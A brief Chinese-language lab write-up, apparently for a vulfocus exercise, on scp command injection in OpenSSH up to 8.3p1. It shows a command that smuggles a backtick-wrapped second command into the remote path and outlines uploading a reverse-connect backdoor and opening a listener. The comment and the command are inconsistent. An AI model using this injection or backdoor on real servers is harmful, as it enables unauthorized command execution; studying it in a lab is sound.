漏洞描述:
OpenSSH是用于使用SSH协议进行远程登录的一个开源实现。通过对交互的流量进行加密防止窃听,连接劫持以及其他攻击。OpenSSH由OpenBSD项目的一些开发人员开发, 并以BSD样式的许可证提供,且已被集成到许多商业产品中。
OpenSSH的小于等于8.3p1版本中的scp允许在scp.c远程功能中注入命令,攻击者可利用该漏洞执行任意命令。密码vulfocus:vulfocus
影响范围:
OpenSSH<=8.3p1
漏洞复现
#意思是复制当前目录下的test.txt到目标的/tmp目录下,并且执行 touch /tmp/test.sh 的命令
scp / test.sh root@192.168.10.129:'`cat /tmp/test.sh`/tmp/test.sh'
没有使用小于8.3版本的openssh,只能进行文件上传和下载。也可以拿到后门
首先在本地编写好反联后门
Touch chengwenji.sh
Nano chengwenji.sh
使用scp进行上传
开启端口监听👂
这个条件比较苛刻,需要用户自己打开后门